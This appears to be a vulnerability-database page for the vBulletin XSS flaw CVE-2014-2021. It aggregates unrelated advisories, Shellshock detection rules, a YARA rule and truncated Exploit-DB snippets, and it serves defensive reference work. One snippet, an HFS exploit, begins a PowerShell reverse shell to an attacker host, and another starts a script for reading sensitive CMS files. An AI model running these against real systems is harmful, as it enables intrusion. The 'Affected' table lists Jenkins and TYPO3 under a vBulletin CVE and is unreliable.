CVE-2014-2021
published 2014-10-25CVE-2014-2021: Cross-site scripting (XSS) vulnerability in admincp/apilog.php in vBulletin 4.2.2 and earlier, and 5.0.x through 5.0.5 allows remote authenticated users to…
PriorityP421low3.5CVSS 2.0
AVNACMAuSCNIPAN
EXPLOIT
EPSS
3.39%
87.3th percentile
Cross-site scripting (XSS) vulnerability in admincp/apilog.php in vBulletin 4.2.2 and earlier, and 5.0.x through 5.0.5 allows remote authenticated users to inject arbitrary web script or HTML via a crafted XMLRPC API request, as demonstrated using the client name.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jenkins | git_plugin | — | — |
| jenkins | jenkins_core | — | — |
| jenkins | jenkins_lts | — | — |
| jenkins | jenkins_weekly | — | — |
| typo3 | cms | >= 11.0.0 < 11.5.0 | 11.5.0 |
| typo3 | cms-core | >= 11.0.0 < 11.5.0 | 11.5.0 |
| vbulletin | vbulletin | <= 4.2.2 | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
CVSS provenance
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
ghsa9.8CRITICAL
osv6.5MEDIUM
vendor_redhat7.8HIGH
vendor_oracle4.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
php-dompdf vulnerabilities
osv·2023-08-08·CVSS 6.5
CVE-2014-5011 php-dompdf vulnerabilities
php-dompdf vulnerabilities
It was discovered that Dompdf was not properly validating untrusted input when
processing HTML content under certain circumstances. An attacker could
possibly use this issue to expose sensitive information or execute arbitrary
code. This issue only affected Ubuntu 16.04 LTS.
(CVE-2014-5011, CVE-2014-5012, CVE-2014-5013)
It was discovered that Dompdf was not properly validating processed HTML
content that referenced PHAR files, which could result in the deserialization
of untrusted data. An attacker could possibly use this issue to execute
arbitrary code. (CVE-2021-3838)
It was discovered that Dompdf was not properly validating processed HTML
content that referenced both a remote base and a local file, which could
result in the bypass of a chroot check. An atta
GHSA
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
ghsa·2022-05-24·CVSS 9.1
CVE-2021-21685 [CRITICAL] CWE-862 Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.
Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.
SECURITY-2427 / CVE-2021-21685: `FilePath#mkdirs` does not check permission to create parent directories.
We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory](https://www.jenkins.io/security/advisory/201
GHSA
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
ghsa·2022-05-24·CVSS 9.1
CVE-2021-21689 [CRITICAL] CWE-862 Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.
Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.
SECURITY-2485 / CVE-2021-21689: `FilePath#unzip` and `FilePath#untar` were not subject to any access control.
We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory](https://www.jenkins.io/security/advisory
GHSA
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
ghsa·2022-05-24·CVSS 9.8
CVE-2021-21693 [CRITICAL] CWE-285 Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.
Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.
SECURITY-2539 / CVE-2021-21693: When creating temporary files, permission to create files is only checked after they’ve been created.
We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory](https://www.jenk
GHSA
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
ghsa·2022-05-24·CVSS 9.1
CVE-2021-21687 [CRITICAL] CWE-862 Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.
Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.
SECURITY-2446 / CVE-2021-21687: `FilePath#untar` does not check permission to create symbolic links when unarchiving a symbolic link.
We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory](https://www.jenk
GHSA
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
ghsa·2022-05-24·CVSS 9.8
CVE-2021-21692 [CRITICAL] CWE-22 Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.
Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.
SECURITY-2538 / CVE-2021-21692: The operations `FilePath#renameTo` and `FilePath#moveAllChildrenTo` only check read permission on the source path.
We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory](htt
GHSA
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
ghsa·2022-05-24·CVSS 9.8
CVE-2021-21690 [CRITICAL] CWE-22 Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins
The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.
Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.
SECURITY-2486 / CVE-2021-21690: Agent processes are able to completely bypass file path filtering by wrapping the file operation in an agent file path.
We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory
GHSA
GHSA-6qpm-jgqq-hh7p: Cross-site scripting (XSS) vulnerability in admincp/apilog
ghsa_unreviewed·2022-05-17
CVE-2014-2021 [LOW] CWE-79 GHSA-6qpm-jgqq-hh7p: Cross-site scripting (XSS) vulnerability in admincp/apilog
Cross-site scripting (XSS) vulnerability in admincp/apilog.php in vBulletin 4.2.2 and earlier, and 5.0.x through 5.0.5 allows remote authenticated users to inject arbitrary web script or HTML via a crafted XMLRPC API request, as demonstrated using the client name.
GHSA
HTTP Host Header Injection
ghsa·2021-10-05·CVSS 5.0
CVE-2021-41114 [MEDIUM] CWE-20 HTTP Host Header Injection
HTTP Host Header Injection
### Meta
* CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:F/RL:O/RC:C` (3.5)
### Problem
It has been discovered that TYPO3 CMS is susceptible to host spoofing due to improper validation of the HTTP _Host_ header. TYPO3 uses the HTTP _Host_ header, for example, to generate absolute URLs during the frontend rendering process. Since the host header itself is provided by the client, it can be forged to any value, even in a name-based virtual hosts environment.
This vulnerability is the same as described in [TYPO3-CORE-SA-2014-001 (CVE-2014-3941)](https://typo3.org/security/advisory/typo3-core-sa-2014-001/). A regression, introduced during TYPO3 v11 development, led to this situation. The already existing setting _$GLOBALS['TYPO3_CONF_VARS']['SYS']['trustedH
Red Hat
kernel: nfc: fix segfault in nfc_genl_dump_devices_done
vendor_redhat·2024-06-19·CVSS 5.5
CVE-2021-47612 [MEDIUM] CWE-476 kernel: nfc: fix segfault in nfc_genl_dump_devices_done
kernel: nfc: fix segfault in nfc_genl_dump_devices_done
In the Linux kernel, the following vulnerability has been resolved:
nfc: fix segfault in nfc_genl_dump_devices_done
When kmalloc in nfc_genl_dump_devices() fails then
nfc_genl_dump_devices_done() segfaults as below
KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]
CPU: 0 PID: 25 Comm: kworker/0:1 Not tainted 5.16.0-rc4-01180-g2a987e65025e-dirty #5
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-6.fc35 04/01/2014
Workqueue: events netlink_sock_destruct_work
RIP: 0010:klist_iter_exit+0x26/0x80
Call Trace:
class_dev_iter_exit+0x15/0x20
nfc_genl_dump_devices_done+0x3b/0x50
genl_lock_done+0x84/0xd0
netlink_sock_destruct+0x8f/0x270
__sk_destruct+0x64/0x3b0
sk_destruct+0xa8/0xd0
__sk_free+0x2e8/0x3d0
Red Hat
kernel: can: isotp: isotp_sendmsg(): add result check for wait_event_interruptible()
vendor_redhat·2024-05-22·CVSS 5.5
CVE-2021-47457 [MEDIUM] CWE-99 kernel: can: isotp: isotp_sendmsg(): add result check for wait_event_interruptible()
kernel: can: isotp: isotp_sendmsg(): add result check for wait_event_interruptible()
In the Linux kernel, the following vulnerability has been resolved:
can: isotp: isotp_sendmsg(): add result check for wait_event_interruptible()
Using wait_event_interruptible() to wait for complete transmission,
but do not check the result of wait_event_interruptible() which can be
interrupted. It will result in TX buffer has multiple accessors and
the later process interferes with the previous process.
Following is one of the problems reported by syzbot.
WARNING: CPU: 0 PID: 0 at net/can/isotp.c:840 isotp_tx_timer_handler+0x2e0/0x4c0
CPU: 0 PID: 0 Comm: swapper/0 Not tainted 5.13.0-rc7+ #68
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1 04/01/2014
RIP: 0010:isotp_tx_timer_ha
Red Hat
kernel: btrfs: do not BUG_ON in link_to_fixup_dir
vendor_redhat·2024-03-25·CVSS 5.5
CVE-2021-47145 [MEDIUM] CWE-460 kernel: btrfs: do not BUG_ON in link_to_fixup_dir
kernel: btrfs: do not BUG_ON in link_to_fixup_dir
In the Linux kernel, the following vulnerability has been resolved:
btrfs: do not BUG_ON in link_to_fixup_dir
While doing error injection testing I got the following panic
kernel BUG at fs/btrfs/tree-log.c:1862!
invalid opcode: 0000 [#1] SMP NOPTI
CPU: 1 PID: 7836 Comm: mount Not tainted 5.13.0-rc1+ #305
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014
RIP: 0010:link_to_fixup_dir+0xd5/0xe0
RSP: 0018:ffffb5800180fa30 EFLAGS: 00010216
RAX: fffffffffffffffb RBX: 00000000fffffffb RCX: ffff8f595287faf0
RDX: ffffb5800180fa37 RSI: ffff8f5954978800 RDI: 0000000000000000
RBP: ffff8f5953af9450 R08: 0000000000000019 R09: 0000000000000001
R10: 000151f408682970 R11: 0000000120021001 R12: ffff8f5954978800
R13: ffff8f5952
Red Hat
kernel: mm/hwpoison: clear MF_COUNT_INCREASED before retrying get_any_page()
vendor_redhat·2024-03-04·CVSS 5.5
CVE-2021-47090 [MEDIUM] CWE-20 kernel: mm/hwpoison: clear MF_COUNT_INCREASED before retrying get_any_page()
kernel: mm/hwpoison: clear MF_COUNT_INCREASED before retrying get_any_page()
In the Linux kernel, the following vulnerability has been resolved:
mm/hwpoison: clear MF_COUNT_INCREASED before retrying get_any_page()
Hulk Robot reported a panic in put_page_testzero() when testing
madvise() with MADV_SOFT_OFFLINE. The BUG() is triggered when retrying
get_any_page(). This is because we keep MF_COUNT_INCREASED flag in
second try but the refcnt is not increased.
page dumped because: VM_BUG_ON_PAGE(page_ref_count(page) == 0)
------------[ cut here ]------------
kernel BUG at include/linux/mm.h:737!
invalid opcode: 0000 [#1] PREEMPT SMP
CPU: 5 PID: 2135 Comm: sshd Tainted: G B 5.16.0-rc6-dirty #373
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
RIP: releas
Red Hat
kernel: rtw88: Fix array overrun in rtw_get_tx_power_params()
vendor_redhat·2024-02-29·CVSS 7.8
CVE-2021-47065 [HIGH] CWE-121 kernel: rtw88: Fix array overrun in rtw_get_tx_power_params()
kernel: rtw88: Fix array overrun in rtw_get_tx_power_params()
In the Linux kernel, the following vulnerability has been resolved:
rtw88: Fix array overrun in rtw_get_tx_power_params()
Using a kernel with the Undefined Behaviour Sanity Checker (UBSAN) enabled, the
following array overrun is logged:
UBSAN: array-index-out-of-bounds in /home/finger/wireless-drivers-next/drivers/net/wireless/realtek/rtw88/phy.c:1789:34
index 5 is out of range for type 'u8 [5]'
CPU: 2 PID: 84 Comm: kworker/u16:3 Tainted: G O 5.12.0-rc5-00086-gd88bba47038e-dirty #651
Hardware name: TOSHIBA TECRA A50-A/TECRA A50-A, BIOS Version 4.50 09/29/2014
Workqueue: phy0 ieee80211_scan_work [mac80211]
Call Trace:
dump_stack+0x64/0x7c
ubsan_epilogue+0x5/0x40
__ubsan_handle_out_of_bounds.cold+0x43/0x48
rtw_get_tx_power_params
Red Hat
kernel: f2fs: compress: fix race condition of overwrite vs truncate
vendor_redhat·2024-02-28·CVSS 4.7
CVE-2021-46982 [MEDIUM] CWE-362 kernel: f2fs: compress: fix race condition of overwrite vs truncate
kernel: f2fs: compress: fix race condition of overwrite vs truncate
In the Linux kernel, the following vulnerability has been resolved:
f2fs: compress: fix race condition of overwrite vs truncate
pos_fsstress testcase complains a panic as belew:
------------[ cut here ]------------
kernel BUG at fs/f2fs/compress.c:1082!
invalid opcode: 0000 [#1] SMP PTI
CPU: 4 PID: 2753477 Comm: kworker/u16:2 Tainted: G OE 5.12.0-rc1-custom #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
Workqueue: writeback wb_workfn (flush-252:16)
RIP: 0010:prepare_compress_overwrite+0x4c0/0x760 [f2fs]
Call Trace:
f2fs_prepare_compress_overwrite+0x5f/0x80 [f2fs]
f2fs_write_cache_pages+0x468/0x8a0 [f2fs]
f2fs_write_data_pages+0x2a4/0x2f0 [f2fs]
do_writepages+0x38/0xc0
__writeback_single
Red Hat
kernel: net/sched: sch_frag: fix stack OOB read while fragmenting IPv4 packets
vendor_redhat·2024-02-27·CVSS 7.1
CVE-2021-46954 [HIGH] CWE-125 kernel: net/sched: sch_frag: fix stack OOB read while fragmenting IPv4 packets
kernel: net/sched: sch_frag: fix stack OOB read while fragmenting IPv4 packets
In the Linux kernel, the following vulnerability has been resolved:
net/sched: sch_frag: fix stack OOB read while fragmenting IPv4 packets
when 'act_mirred' tries to fragment IPv4 packets that had been previously
re-assembled using 'act_ct', splats like the following can be observed on
kernels built with KASAN:
BUG: KASAN: stack-out-of-bounds in ip_do_fragment+0x1b03/0x1f60
Read of size 1 at addr ffff888147009574 by task ping/947
CPU: 0 PID: 947 Comm: ping Not tainted 5.12.0-rc6+ #418
Hardware name: Red Hat KVM, BIOS 1.11.1-4.module+el8.1.0+4066+0f1aadab 04/01/2014
Call Trace:
dump_stack+0x92/0xc1
print_address_description.constprop.7+0x1a/0x150
kasan_report.cold.13+0x7f/0x111
ip_do_fragment+0x1b03/0x1f60
sch_
Red Hat
mysql: Server: PAM Auth Plugin unspecified vulnerability (CPU Jan 2021)
vendor_redhat·2021-01-19·CVSS 4.9
CVE-2021-2014 [MEDIUM] mysql: Server: PAM Auth Plugin unspecified vulnerability (CPU Jan 2021)
mysql: Server: PAM Auth Plugin unspecified vulnerability (CPU Jan 2021)
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PAM Auth Plugin). Supported versions that are affected are 5.7.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
Package: mysql (Red Hat Enterprise Linux 6) - Not affected
Package: mariadb (Red Hat Enterprise Linux 7) - Not affected
Package: mariadb:10.3/mariadb (Red Hat Enterprise
Oracle
Oracle Oracle MySQL Risk Matrix: Server: PAM Auth Plugin — CVE-2021-2014
vendor_oracle·2021-01-15·CVSS 4.9
CVE-2021-2014 [MEDIUM] Oracle Oracle MySQL Risk Matrix: Server: PAM Auth Plugin — CVE-2021-2014
Oracle Oracle MySQL Risk Matrix: Server: PAM Auth Plugin vulnerability
CVE: CVE-2021-2014
CVSS: 4.9
Protocol: MySQL Protocol
Remote exploit: No
Affected versions: Network
Advisory: cpujan2021 (JAN 2021)
Suricata
ET EXPLOIT VisualDoor Sonicwall SSL VPN Exploit Attempt
suricata·2021-01-25
CVE-2014-6271 ET EXPLOIT VisualDoor Sonicwall SSL VPN Exploit Attempt
ET EXPLOIT VisualDoor Sonicwall SSL VPN Exploit Attempt
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT VisualDoor Sonicwall SSL VPN Exploit Attempt"; flow:established,to_server; http.uri; content:"/cgi-bin/jarrewrite.sh"; endswith; fast_pattern; http.user_agent; content:"|28 29 20 7b|"; reference:url,darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/; reference:cve,2014-6271; classtype:attempted-admin; sid:2031543; rev:2; metadata:attack_target Client_Endpoint, created_at 2021_01_25, cve CVE_2014_6271, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_01_25;)
Suricata
ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers
suricata·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers
ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers"; flow:established,to_server; http.header; content:"|28 29 20 7b|"; fast_pattern; content:"bash|20 2d|c"; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; classtype:attempted-admin; sid:2019232; rev:7; metadata:created_at 2014_09_25, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_11_03, reviewed_at 2024_03_06;)
YARA
Linux_Exploit_CVE_2014_3153_1c1e02ad
yara·CVSS 7.8
CVE-2014-3153 [HIGH] Linux_Exploit_CVE_2014_3153_1c1e02ad
rule Linux_Exploit_CVE_2014_3153_1c1e02ad {
meta:
author = "Elastic Security"
id = "1c1e02ad-eb06-4eb6-a424-0f1dd6eebb2a"
fingerprint = "a0a82cd15713be3f262021d6ed6572a0d4763ccfd0499e6b9374764c89705c2a"
creation_date = "2021-01-12"
last_modified = "2021-09-16"
threat_name = "Linux.Exploit.CVE-2014-3153"
reference_sample = "64b8c61b73f0c0c0bd44ea5c2bcfb7b665fcca219dbe074a4a16ae20cd565812"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { 55 48 89 E5 48 83 EC 40 48 89 7D C8 48 8D 4D D0 48 8B 45 C8 BA 24 00 }
condition:
all of them
}
Exploit-DB
Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
exploitdb·2021-10-18·CVSS 7.5
CVE-2018-16060 [HIGH] Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
---
# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
# Date: 2021-17-10
# Exploit Author: Hamit CİBO
# Vendor Homepage: https://www.inea.si
# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
# Version: ME RTU
# Tested on: Windows
# CVE : CVE-2018-16060
# PoC
# Request
GET /web HTTP/1.1
Host: **.**.**.***
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
x64; Trident/5.0)
Connection: close
# Response
HTTP/1.1 200 OK
Date: Wed, 08 Aug 2018 08:09:53 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Location: web.tar
Vary: negotiate
TCN: choice
Last-Modified: Wed, 19 Nov 2014 09:40:36 GMT
ETag: "93800-50
Exploit-DB
GetSimple CMS 3.3.4 - Information Disclosure
exploitdb·2021-06-02·CVSS 7.5
CVE-2014-8722 [HIGH] GetSimple CMS 3.3.4 - Information Disclosure
GetSimple CMS 3.3.4 - Information Disclosure
---
# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure
# Date 01.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: http://get-simple.info/
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
# Version: 3.3.4
# CVE: CVE-2014-8722
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit
'''
Description:
GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
(1) data/users/.xml,
(2) backups/users/.xml.bak,
(3) data/other/authorization.xml, or
(4) data/other/appid.xml.
'''
'''
Import required modules:
'''
import sys
import requests
'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
cmspath
Exploit-DB
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
exploitdb·2021-02-23·CVSS 9.8
CVE-2014-6287 [CRITICAL] HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
---
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
#!/usr/bin/python3
import base64
import os
import urllib.request
import urllib.parse
lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80
# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $clien
Exploit-DB
vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API (Authenticated) Persistent Cross-Site Scripting
exploitdb·2014-10-12·CVSS 3.5
CVE-2014-2021 [LOW] vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API (Authenticated) Persistent Cross-Site Scripting
vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API (Authenticated) Persistent Cross-Site Scripting
---
CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API (post-auth)
Overview
date : 10/12/2014
cvss : 4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) base
cwe : 79
vendor : vBulletin Solutions
product : vBulletin 4
versions affected : latest 4.x and 5.x (to date); verified "API-Key" and enable the API interface, generate key
goto "vBulletin API"->"API-Log" and enable all API logging
2) run PoC
edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
run PoC, wait for SUCCESS! message
3) trigger exploit
logon to AdminCP
goto "vBulletin API"->"API-Log" and hit "view"
in search results click on "client name"
the injected msgbox pops up
Timeline
2014-01-14: initial
No writeups or analysis indexed.
http://packetstormsecurity.com/files/128691/vBulletin-5.x-4.x-Persistent-Cross-Site-Scripting.htmlhttp://seclists.org/fulldisclosure/2014/Oct/55http://seclists.org/fulldisclosure/2014/Oct/63http://www.securityfocus.com/bid/70577http://www.securitytracker.com/id/1031000https://exchange.xforce.ibmcloud.com/vulnerabilities/97026https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021http://packetstormsecurity.com/files/128691/vBulletin-5.x-4.x-Persistent-Cross-Site-Scripting.htmlhttp://seclists.org/fulldisclosure/2014/Oct/55http://seclists.org/fulldisclosure/2014/Oct/63http://www.securityfocus.com/bid/70577http://www.securitytracker.com/id/1031000https://exchange.xforce.ibmcloud.com/vulnerabilities/97026https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021
2014-10-25
Published